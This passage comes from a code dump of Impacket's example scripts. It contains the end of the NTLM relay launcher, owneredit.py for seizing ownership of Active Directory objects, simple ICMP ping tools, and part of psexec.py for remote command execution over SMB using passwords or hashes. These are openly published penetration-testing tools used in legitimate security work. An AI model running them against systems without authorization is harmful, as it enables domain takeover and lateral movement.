TargetsFileWatcher(targetSystem)\n watchthread.start()\n\n threads = set()\n socksServer = None\n if options.socks is True:\n\n # Start a SOCKS proxy in the background\n socksServer = SOCKS(server_address=(options.socks_address, options.socks_port), api_port=options.http_api_port)\n socksServer.daemon_threads = True\n socks_thread = Thread(target=socksServer.serve_forever)\n socks_thread.daemon = True\n socks_thread.start()\n threads.add(socks_thread)\n\n if 'interface_ip' not in options:\n options.interface_ip = '::' if options.ipv6 else '0.0.0.0'\n\n c = start_servers(options, threads)\n\n # Log multirelay flag status\n if options.no_multirelay:\n logging.info(\"Multirelay disabled\")\n else:\n logging.info(\"Multirelay enabled\")\n\n print(\"\")\n logging.info(\"Servers started, waiting for connections\")\n try:\n if options.socks:\n shell = MiniShell(c, threads, api_address='{}:{}'.format(options.socks_address, options.http_api_port))\n shell.cmdloop()\n else:\n sys.stdin.read()\n except KeyboardInterrupt:\n pass\n else:\n pass\n\n if options.socks is True:\n socksServer.shutdown()\n del socksServer\n\n for s in threads:\n del s\n\n sys.exit(0)\n" }, { "path": "examples/owneredit.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Python script for reading and modifying the Owner attribute (OwnerSid) of an Active Directory object.\n#\n# Authors:\n# Charlie BROMBERG (@_nwodtuhs)\n\nimport argparse\nimport logging\nimport sys\nimport traceback\n\nimport ldap3\nimport ldapdomaindump\nfrom ldap3.protocol.formatters.formatters import format_sid\n\nfrom impacket import version\nfrom impacket.examples import logger, utils\nfrom impacket.ldap import ldaptypes\nfrom ldap3.utils.conv import escape_filter_chars\nfrom ldap3.protocol.microsoft import security_descriptor_control\n\nfrom impacket.examples.utils import init_ldap_session, parse_identity\n\n\n# Universal SIDs\nWELL_KNOWN_SIDS = {\n 'S-1-0': 'Null Authority',\n 'S-1-0-0': 'Nobody',\n 'S-1-1': 'World Authority',\n 'S-1-1-0': 'Everyone',\n 'S-1-2': 'Local Authority',\n 'S-1-2-0': 'Local',\n 'S-1-2-1': 'Console Logon',\n 'S-1-3': 'Creator Authority',\n 'S-1-3-0': 'Creator Owner',\n 'S-1-3-1': 'Creator Group',\n 'S-1-3-2': 'Creator Owner Server',\n 'S-1-3-3': 'Creator Group Server',\n 'S-1-3-4': 'Owner Rights',\n 'S-1-5-80-0': 'All Services',\n 'S-1-4': 'Non-unique Authority',\n 'S-1-5': 'NT Authority',\n 'S-1-5-1': 'Dialup',\n 'S-1-5-2': 'Network',\n 'S-1-5-3': 'Batch',\n 'S-1-5-4': 'Interactive',\n 'S-1-5-6': 'Service',\n 'S-1-5-7': 'Anonymous',\n 'S-1-5-8': 'Proxy',\n 'S-1-5-9': 'Enterprise Domain Controllers',\n 'S-1-5-10': 'Principal Self',\n 'S-1-5-11': 'Authenticated Users',\n 'S-1-5-12': 'Restricted Code',\n 'S-1-5-13': 'Terminal Server Users',\n 'S-1-5-14': 'Remote Interactive Logon',\n 'S-1-5-15': 'This Organization',\n 'S-1-5-17': 'This Organization',\n 'S-1-5-18': 'Local System',\n 'S-1-5-19': 'NT Authority',\n 'S-1-5-20': 'NT Authority',\n 'S-1-5-32-544': 'Administrators',\n 'S-1-5-32-545': 'Users',\n 'S-1-5-32-546': 'Guests',\n 'S-1-5-32-547': 'Power Users',\n 'S-1-5-32-548': 'Account Operators',\n 'S-1-5-32-549': 'Server Operators',\n 'S-1-5-32-550': 'Print Operators',\n 'S-1-5-32-551': 'Backup Operators',\n 'S-1-5-32-552': 'Replicators',\n 'S-1-5-64-10': 'NTLM Authentication',\n 'S-1-5-64-14': 'SChannel Authentication',\n 'S-1-5-64-21': 'Digest Authority',\n 'S-1-5-80': 'NT Service',\n 'S-1-5-83-0': 'NT VIRTUAL MACHINE\\\\Virtual Machines',\n 'S-1-16-0': 'Untrusted Mandatory Level',\n 'S-1-16-4096': 'Low Mandatory Level',\n 'S-1-16-8192': 'Medium Mandatory Level',\n 'S-1-16-8448': 'Medium Plus Mandatory Level',\n 'S-1-16-12288': 'High Mandatory Level',\n 'S-1-16-16384': 'System Mandatory Level',\n 'S-1-16-20480': 'Protected Process Mandatory Level',\n 'S-1-16-28672': 'Secure Process Mandatory Level',\n 'S-1-5-32-554': 'BUILTIN\\\\Pre-Windows 2000 Compatible Access',\n 'S-1-5-32-555': 'BUILTIN\\\\Remote Desktop Users',\n 'S-1-5-32-557': 'BUILTIN\\\\Incoming Forest Trust Builders',\n 'S-1-5-32-556': 'BUILTIN\\\\Network Configuration Operators',\n 'S-1-5-32-558': 'BUILTIN\\\\Performance Monitor Users',\n 'S-1-5-32-559': 'BUILTIN\\\\Performance Log Users',\n 'S-1-5-32-560': 'BUILTIN\\\\Windows Authorization Access Group',\n 'S-1-5-32-561': 'BUILTIN\\\\Terminal Server License Servers',\n 'S-1-5-32-562': 'BUILTIN\\\\Distributed COM Users',\n 'S-1-5-32-569': 'BUILTIN\\\\Cryptographic Operators',\n 'S-1-5-32-573': 'BUILTIN\\\\Event Log Readers',\n 'S-1-5-32-574': 'BUILTIN\\\\Certificate Service DCOM Access',\n 'S-1-5-32-575': 'BUILTIN\\\\RDS Remote Access Servers',\n 'S-1-5-32-576': 'BUILTIN\\\\RDS Endpoint Servers',\n 'S-1-5-32-577': 'BUILTIN\\\\RDS Management Servers',\n 'S-1-5-32-578': 'BUILTIN\\\\Hyper-V Administrators',\n 'S-1-5-32-579': 'BUILTIN\\\\Access Control Assistance Operators',\n 'S-1-5-32-580': 'BUILTIN\\\\Remote Management Users',\n}\n\nclass OwnerEdit(object):\n def __init__(self, ldap_server, ldap_session, args):\n super(OwnerEdit, self).__init__()\n self.ldap_server = ldap_server\n self.ldap_session = ldap_session\n\n self.target_sAMAccountName = args.target_sAMAccountName\n self.target_SID = args.target_SID\n self.target_DN = args.target_DN\n\n self.new_owner_sAMAccountName = args.new_owner_sAMAccountName\n self.new_owner_SID = args.new_owner_SID\n self.new_owner_DN = args.new_owner_DN\n\n logging.debug('Initializing domainDumper()')\n cnf = ldapdomaindump.domainDumpConfig()\n cnf.basepath = None\n self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)\n\n if self.target_sAMAccountName or self.target_SID or self.target_DN:\n # Searching for target account with its security descriptor\n self.search_target_principal_security_descriptor()\n # Extract security descriptor data\n self.target_principal_raw_security_descriptor = self.target_principal['nTSecurityDescriptor'].raw_values[0]\n self.target_principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.target_principal_raw_security_descriptor)\n\n # Searching for the owner SID if any owner argument was given and new_owner_SID wasn't\n if self.new_owner_SID is None and self.new_owner_sAMAccountName is not None or self.new_owner_DN is not None:\n _lookedup_owner = \"\"\n if self.new_owner_sAMAccountName is not None:\n _lookedup_owner = self.new_owner_sAMAccountName\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_owner), attributes=['objectSid'])\n elif self.new_owner_DN is not None:\n _lookedup_owner = self.new_owner_DN\n self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_owner, attributes=['objectSid'])\n try:\n self.new_owner_SID = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])\n logging.debug(\"Found new owner SID: %s\" % self.new_owner_SID)\n except IndexError:\n logging.error('New owner SID not found in LDAP (%s)' % _lookedup_owner)\n exit(1)\n\n def read(self):\n current_owner_SID = format_sid(self.target_principal_security_descriptor['OwnerSid']).formatCanonical()\n logging.info(\"Current owner information below\")\n logging.info(\"- SID: %s\" % current_owner_SID)\n logging.info(\"- sAMAccountName: %s\" % self.resolveSID(current_owner_SID))\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % current_owner_SID, attributes=['distinguishedName'])\n current_owner_distinguished_name = self.ldap_session.entries[0]\n logging.info(\"- distinguishedName: %s\" % current_owner_distinguished_name['distinguishedName'])\n\n def write(self):\n logging.debug('Attempt to modify the OwnerSid')\n _new_owner_SID = ldaptypes.LDAP_SID()\n _new_owner_SID.fromCanonical(self.new_owner_SID)\n # lib doesn't set this, but I don't known if it's needed\n # _new_owner_SID['SubLen'] = len(_new_owner_SID['SubAuthority'])\n self.target_principal_security_descriptor['OwnerSid'] = _new_owner_SID\n\n self.ldap_session.modify(\n self.target_principal.entry_dn,\n {'nTSecurityDescriptor': (ldap3.MODIFY_REPLACE, [\n self.target_principal_security_descriptor.getData()\n ])},\n controls=security_descriptor_control(sdflags=0x01))\n if self.ldap_session.result['result'] == 0:\n logging.info('OwnerSid modified successfully!')\n else:\n if self.ldap_session.result['result'] == 50:\n logging.error('Could not modify object, the server reports insufficient rights: %s',\n self.ldap_session.result['message'])\n elif self.ldap_session.result['result'] == 19:\n logging.error('Could not modify object, the server reports a constrained violation: %s',\n self.ldap_session.result['message'])\n else:\n logging.error('The server returned an error: %s', self.ldap_session.result['message'])\n\n # Attempts to retrieve the Security Descriptor of the specified target\n def search_target_principal_security_descriptor(self):\n _lookedup_principal = \"\"\n # Set SD flags to only query for OwnerSid\n controls = security_descriptor_control(sdflags=0x01)\n if self.target_sAMAccountName is not None:\n _lookedup_principal = self.target_sAMAccountName\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['nTSecurityDescriptor'], controls=controls)\n elif self.target_SID is not None:\n _lookedup_principal = self.target_SID\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)\n elif self.target_DN is not None:\n _lookedup_principal = self.target_DN\n self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)\n try:\n self.target_principal = self.ldap_session.entries[0]\n logging.debug('Target principal found in LDAP (%s)' % _lookedup_principal)\n except IndexError:\n logging.error('Target principal not found in LDAP (%s)' % _lookedup_principal)\n exit(0)\n\n # Attempts to resolve a SID and return the corresponding samaccountname\n def resolveSID(self, sid):\n # Tries to resolve the SID from the well known SIDs\n if sid in WELL_KNOWN_SIDS.keys() or False:\n return WELL_KNOWN_SIDS[sid]\n # Tries to resolve the SID from the LDAP domain dump\n else:\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % sid, attributes=['samaccountname'])\n try:\n dn = self.ldap_session.entries[0].entry_dn\n samname = self.ldap_session.entries[0]['samaccountname']\n return samname\n except IndexError:\n logging.debug('SID not found in LDAP: %s' % sid)\n return \"\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(add_help=True, description='Python editor for a principal\\'s DACL.')\n parser.add_argument('identity', action='store', help='domain.local/username[:password]')\n parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n auth_con = parser.add_argument_group('authentication & connection')\n auth_con.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n auth_con.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n auth_con.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')\n auth_con.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication (128 or 256 bits)')\n auth_con.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter')\n auth_con.add_argument('-dc-host', action='store', metavar=\"hostname\", help='Hostname of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, -dc-ip will be used')\n\n new_owner_parser = parser.add_argument_group(\"owner\", description=\"Object, controlled by the attacker, to set as owner of the target object\")\n new_owner_parser.add_argument(\"-new-owner\", dest=\"new_owner_sAMAccountName\", metavar=\"NAME\", type=str, required=False, help=\"sAMAccountName\")\n new_owner_parser.add_argument(\"-new-owner-sid\", dest=\"new_owner_SID\", metavar=\"SID\", type=str, required=False, help=\"Security IDentifier\")\n new_owner_parser.add_argument(\"-new-owner-dn\", dest=\"new_owner_DN\", metavar=\"DN\", type=str, required=False, help=\"Distinguished Name\")\n\n target_parser = parser.add_argument_group(\"target\", description=\"Target object to edit the owner of\")\n target_parser.add_argument(\"-target\", dest=\"target_sAMAccountName\", metavar=\"NAME\", type=str, required=False, help=\"sAMAccountName\")\n target_parser.add_argument(\"-target-sid\", dest=\"target_SID\", metavar=\"SID\", type=str, required=False, help=\"Security IDentifier\")\n target_parser.add_argument(\"-target-dn\", dest=\"target_DN\", metavar=\"DN\", type=str, required=False, help=\"Distinguished Name\")\n\n dacl_parser = parser.add_argument_group(\"dacl editor\")\n dacl_parser.add_argument('-action', choices=['read', 'write'], nargs='?', default='read', help='Action to operate on the owner attribute')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\ndef main():\n print(version.BANNER)\n args = parse_args()\n logger.init(args.ts, args.debug)\n\n if args.action == 'write' and args.new_owner_sAMAccountName is None and args.new_owner_SID is None and args.new_owner_DN is None:\n logging.critical('-owner, -owner-sid, or -owner-dn should be specified when using -action write')\n sys.exit(1)\n\n if args.action == \"restore\" and not args.filename:\n logging.critical('-file is required when using -action restore')\n\n domain, username, password, lmhash, nthash, args.k = parse_identity(args.identity, args.hashes, args.no_pass, args.aesKey, args.k)\n\n try:\n ldap_server, ldap_session = init_ldap_session(domain, username, password, lmhash, nthash, args.k, args.dc_ip, args.dc_host, args.aesKey, args.use_ldaps)\n owneredit = OwnerEdit(ldap_server, ldap_session, args)\n if args.action == 'read':\n owneredit.read()\n elif args.action == 'write':\n owneredit.read()\n owneredit.write()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n traceback.print_exc()\n logging.error(str(e))\n\n\nif __name__ == '__main__':\n main()\n" }, { "path": "examples/ping.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple ICMP ping.\n#\n# This implementation of ping uses the ICMP echo and echo-reply packets\n# to check the status of a host. If the remote host is up, it should reply\n# to the echo probe with an echo-reply packet.\n# Note that this isn't a definite test, as in the case the remote host is up\n# but refuses to reply the probes.\n# Also note that the user must have special access to be able to open a raw\n# socket, which this program requires.\n#\n# Authors:\n# Gerardo Richarte (@gerasdf)\n# Javier Kohen\n#\n# Reference for:\n# ImpactPacket: IP, ICMP, DATA\n# ImpactDecoder\n#\n\nimport select\nimport socket\nimport time\nimport sys\n\nfrom impacket import ImpactDecoder, ImpactPacket\n\nif len(sys.argv) < 3:\n print(\"Use: %s \" % sys.argv[0])\n sys.exit(1)\n\nsrc = sys.argv[1]\ndst = sys.argv[2]\n\n# Create a new IP packet and set its source and destination addresses.\n\nip = ImpactPacket.IP()\nip.set_ip_src(src)\nip.set_ip_dst(dst)\n\n# Create a new ICMP packet of type ECHO.\n\nicmp = ImpactPacket.ICMP()\nicmp.set_icmp_type(icmp.ICMP_ECHO)\n\n# Include a 156-character long payload inside the ICMP packet.\nicmp.contains(ImpactPacket.Data(b\"A\"*156))\n\n# Have the IP packet contain the ICMP packet (along with its payload).\nip.contains(icmp)\n\n# Open a raw socket. Special permissions are usually required.\ns = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\ns.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\nseq_id = 0\nwhile 1:\n # Give the ICMP packet the next ID in the sequence.\n seq_id += 1\n icmp.set_icmp_id(seq_id)\n\n # Calculate its checksum.\n icmp.set_icmp_cksum(0)\n icmp.auto_checksum = 1\n\n # Send it to the target host.\n s.sendto(ip.get_packet(), (dst, 0))\n\n # Wait for incoming replies.\n if s in select.select([s], [], [], 1)[0]:\n reply = s.recvfrom(2000)[0]\n\n # Use ImpactDecoder to reconstruct the packet hierarchy.\n rip = ImpactDecoder.IPDecoder().decode(reply)\n # Extract the ICMP packet from its container (the IP packet).\n ricmp = rip.child()\n\n # If the packet matches, report it to the user.\n if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():\n print(\"Ping reply for sequence #%d\" % ricmp.get_icmp_id())\n\n time.sleep(1)\n" }, { "path": "examples/ping6.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple ICMP6 ping.\n#\n# This implementation of ping uses the ICMP echo and echo-reply packets\n# to check the status of a host. If the remote host is up, it should reply\n# to the echo probe with an echo-reply packet.\n# Note that this isn't a definite test, as in the case the remote host is up\n# but refuses to reply the probes.\n# Also note that the user must have special access to be able to open a raw\n# socket, which this program requires.\n#\n# Authors:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# ImpactPacket: ICMP6\n# ImpactDecoder\n#\n\nimport select\nimport socket\nimport time\nimport sys\n\nfrom impacket import ImpactDecoder, IP6, ICMP6, version\n\nprint(version.BANNER)\n\nif len(sys.argv) < 3:\n print(\"Use: %s \" % sys.argv[0])\n sys.exit(1)\n\nsrc = sys.argv[1]\ndst = sys.argv[2]\n\n# Create a new IP packet and set its source and destination addresses.\n\nip = IP6.IP6()\nip.set_ip_src(src)\nip.set_ip_dst(dst)\nip.set_traffic_class(0)\nip.set_flow_label(0)\nip.set_hop_limit(64)\n\n# Open a raw socket. Special permissions are usually required.\ns = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)\n\npayload = b\"A\"*156\n\nprint(\"PING %s %d data bytes\" % (dst, len(payload)))\nseq_id = 0\nwhile 1:\n # Give the ICMP packet the next ID in the sequence.\n seq_id += 1\n icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload)\n\n # Have the IP packet contain the ICMP packet (along with its payload).\n ip.contains(icmp)\n ip.set_next_header(ip.child().get_ip_protocol_number())\n ip.set_payload_length(ip.child().get_size())\n icmp.calculate_checksum()\n\n # Send it to the target host.\n s.sendto(icmp.get_packet(), (dst, 0))\n\n # Wait for incoming replies.\n if s in select.select([s], [], [], 1)[0]:\n reply = s.recvfrom(2000)[0]\n\n # Use ImpactDecoder to reconstruct the packet hierarchy.\n rip = ImpactDecoder.ICMP6Decoder().decode(reply)\n\n # If the packet matches, report it to the user.\n if ICMP6.ICMP6.ECHO_REPLY == rip.get_type():\n print(\"%d bytes from %s: icmp_seq=%d \" % (rip.child().get_size()-4, dst, rip.get_echo_sequence_number()))\n\n time.sleep(1)\n" }, { "path": "examples/psexec.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom)\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# DCE/RPC and SMB.\n#\n\nimport sys\nimport os\nimport re\nimport cmd\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nimport random\nimport string\nimport time\nfrom six import PY3\n\nfrom impacket.examples import logger\nfrom impacket import version, smb\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.structure import Structure\nfrom impacket.examples import remcomsvc, serviceinstall\nfrom impacket.examples.utils import parse_target\nfrom impacket.krb5.keytab import Keytab\n\nCODEC = sys.stdout.encoding\n\nclass RemComMessage(Structure):\n structure = (\n ('Command','4096s=\"\"'),\n ('WorkingDir','260s=\"\"'),\n ('Priority',' 0:\n try:\n s.waitNamedPipe(tid,pipe)\n pipeReady = True\n except:\n tries -= 1\n time.sleep(2)\n pass\n\n if tries == 0:\n raise Exception('Pipe not ready, aborting')\n\n fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)\n\n return fid\n\n def doStuff(self, rpctransport):\n\n dce = rpctransport.get_dce_rpc()\n try:\n dce.connect()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.critical(str(e))\n sys.exit(1)\n\n global dialect\n dialect = rpctransport.get_smb_connection().getDialect()\n\n try:\n unInstalled = False\n s = rpctransport.get_smb_connection()\n\n # We don't wanna deal with timeouts from now on.\n s.setTimeout(100000)\n if self.__exeFile is None:\n installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc(), self.__serviceName, self.__remoteBinaryName)\n else:\n try:\n f = open(self.__exeFile, 'rb')\n except Exception as e:\n logging.critical(str(e))\n sys.exit(1)\n installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f, self.__serviceName, self.__remoteBinaryName)\n\n if installService.install() is False:\n return\n\n if self.__exeFile is not None:\n f.close()\n\n # Check if we need to copy a file for execution\n if self.__copyFile is not None:\n installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))\n # And we change the command to be executed to this filename\n self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command\n\n tid = s.connectTree('IPC$')\n fid_main = self.openPipe(s,tid,r'\\RemCom_communicaton',0x12019f)\n\n packet = RemComMessage()\n pid = os.getpid()\n\n packet['Machine'] = ''.join([random.choice(string.ascii_letters) for _ in range(4)])\n if self.__path is not None:\n packet['WorkingDir'] = self.__path\n packet['Command'] = self.__command\n packet['ProcessID'] = pid\n\n s.writeNamedPipe(tid, fid_main, packet.getData())\n\n # Here we'll store the command we type so we don't print it back ;)\n # ( I know.. globals are nasty :P )\n global LastDataSent\n LastDataSent = ''\n\n # Create the pipes threads\n stdin_pipe = RemoteStdInPipe(rpctransport,\n r'\\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']),\n smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())\n stdin_pipe.start()\n stdout_pipe = RemoteStdOutPipe(rpctransport,\n r'\\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']),\n smb.FILE_READ_DATA)\n stdout_pipe.start()\n stderr_pipe = RemoteStdErrPipe(rpctransport,\n r'\\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']),\n smb.FILE_READ_DATA)\n stderr_pipe.start()\n\n # And we stay here till the end\n ans = s.readNamedPipe(tid,fid_main,8)\n\n if len(ans):\n retCode = RemComResponse(ans)\n logging.info(\"Process %s finished with ErrorCode: %d, ReturnCode: %d\" % (\n self.__command, retCode['ErrorCode'], retCode['ReturnCode']))\n installService.uninstall()\n if self.__copyFile is not None:\n # We copied a file for execution, let's remove it\n s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n unInstalled = True\n sys.exit(retCode['ErrorCode'])\n\n except SystemExit:\n raise\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.debug(str(e))\n if unInstalled is False:\n installService.uninstall()\n if self.__copyFile is not None:\n s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n sys.stdout.flush()\n sys.exit(1)\n\n\nclass Pipes(Thread):\n def __init__(self, transport, pipe, permissions, share=None):\n Thread.__init__(self)\n self.server = 0\n self.transport = transport\n self.credentials = transport.get_credentials()\n self.tid = 0\n self.fid = 0\n self.share = share\n self.port = transport.get_dport()\n self.pipe = pipe\n self.permissions = permissions\n self.daemon = True\n\n def connectPipe(self):\n try:\n lock.acquire()\n global dialect\n #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)\n self.server = SMBConnection(self.transport.get_smb_connection().getRemoteName(), self.transport.get_smb_connection().getRemoteHost(),\n sess_port=self.port, preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n if self.transport.get_kerberos() is True:\n self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)\n else:\n self.server.login(user, passwd, domain, lm, nt)\n lock.release()\n self.tid = self.server.connectTree('IPC$')\n\n self.server.waitNamedPipe(self.tid, self.pipe)\n self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)\n self.server.setTimeout(1000000)\n except:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)\n\n\nclass RemoteStdOutPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n\n global LastDataSent\n\n if PY3:\n __stdoutOutputBuffer, __stdoutData = b\"\", b\"\"\n\n while True:\n try:\n stdout_ans = self.server.readFile(self.tid, self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n if stdout_ans != LastDataSent:\n if len(stdout_ans) != 0:\n # Append new data to the buffer while there is data to read\n __stdoutOutputBuffer += stdout_ans\n\n promptRegex = rb'([a-zA-Z]:[\\\\\\/])((([a-zA-Z0-9 -\\.]*)[\\\\\\/]?)+(([a-zA-Z0-9 -\\.]+))?)?>$'\n\n endsWithPrompt = bool(re.match(promptRegex, __stdoutOutputBuffer) is not None)\n if endsWithPrompt == True:\n # All data, we shouldn't have encoding errors\n # Adding a space after the prompt because it's beautiful\n __stdoutData = __stdoutOutputBuffer + b\" \"\n # Remainder data for next iteration\n __stdoutOutputBuffer = b\"\"\n\n # print(\"[+] endsWithPrompt\")\n # print(\" | __stdoutData:\",__stdoutData)\n # print(\" | __stdoutOutputBuffer:\",__stdoutOutputBuffer)\n elif b'\\n' in __stdoutOutputBuffer:\n # We have read a line, print buffer if it is not empty\n lines = __stdoutOutputBuffer.split(b\"\\n\")\n # All lines, we shouldn't have encoding errors\n __stdoutData = b\"\\n\".join(lines[:-1]) + b\"\\n\"\n # Remainder data for next iteration\n __stdoutOutputBuffer = lines[-1]\n # print(\"[+] newline in __stdoutOutputBuffer\")\n # print(\" | __stdoutData:\",__stdoutData)\n # print(\" | __stdoutOutputBuffer:\",__stdoutOutputBuffer)\n\n if len(__stdoutData) != 0:\n # There is data to print\n try:\n sys.stdout.write(__stdoutData.decode(CODEC))\n sys.stdout.flush()\n __stdoutData = b\"\"\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute smbexec.py '\n 'again with -codec and the corresponding codec')\n print(__stdoutData.decode(CODEC, errors='replace'))\n __stdoutData = b\"\"\n else:\n # Don't echo the command that was sent, and clear it up\n LastDataSent = b\"\"\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,\n # it will give false positives tho.. we should find a better way to handle this.\n # if LastDataSent > 10:\n # LastDataSent = ''\n except:\n pass\n else:\n __stdoutOutputBuffer, __stdoutData = \"\", \"\"\n\n while True:\n try:\n stdout_ans = self.server.readFile(self.tid, self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n if stdout_ans != LastDataSent:\n if len(stdout_ans) != 0:\n # Append new data to the buffer while there is data to read\n __stdoutOutputBuffer += stdout_ans\n\n promptRegex = r'([a-zA-Z]:[\\\\\\/])((([a-zA-Z0-9 -\\.]*)[\\\\\\/]?)+(([a-zA-Z0-9 -\\.]+))?)?>$'\n\n endsWithPrompt = bool(re.match(promptRegex, __stdoutOutputBuffer) is not None)\n if endsWithPrompt:\n # All data, we shouldn't have encoding errors\n # Adding a space after the prompt because it's beautiful\n __stdoutData = __stdoutOutputBuffer + \" \"\n # Remainder data for next iteration\n __stdoutOutputBuffer = \"\"\n\n elif '\\n' in __stdoutOutputBuffer:\n # We have read a line, print buffer if it is not empty\n lines = __stdoutOutputBuffer.split(\"\\n\")\n # All lines, we shouldn't have encoding errors\n __stdoutData = \"\\n\".join(lines[:-1]) + \"\\n\"\n # Remainder data for next iteration\n __stdoutOutputBuffer = lines[-1]\n\n if len(__stdoutData) != 0:\n # There is data to print\n sys.stdout.write(__stdoutData.decode(CODEC))\n sys.stdout.flush()\n __stdoutData = \"\"\n else:\n # Don't echo the command that was sent, and clear it up\n LastDataSent = \"\"\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,\n # it will give false positives tho.. we should find a better way to handle this.\n # if LastDataSent > 10:\n # LastDataSent = ''\n except Exception as e:\n pass\n\n\nclass RemoteStdErrPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n\n if PY3:\n __stderrOutputBuffer, __stderrData = b'', b''\n\n while True:\n try:\n stderr_ans = self.server.readFile(self.tid, self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n if len(stderr_ans) != 0:\n # Append new data to the buffer while there is data to read\n __stderrOutputBuffer += stderr_ans\n\n if b'\\n' in __stderrOutputBuffer:\n # We have read a line, print buffer if it is not empty\n lines = __stderrOutputBuffer.split(b\"\\n\")\n # All lines, we shouldn't have encoding errors\n __stderrData = 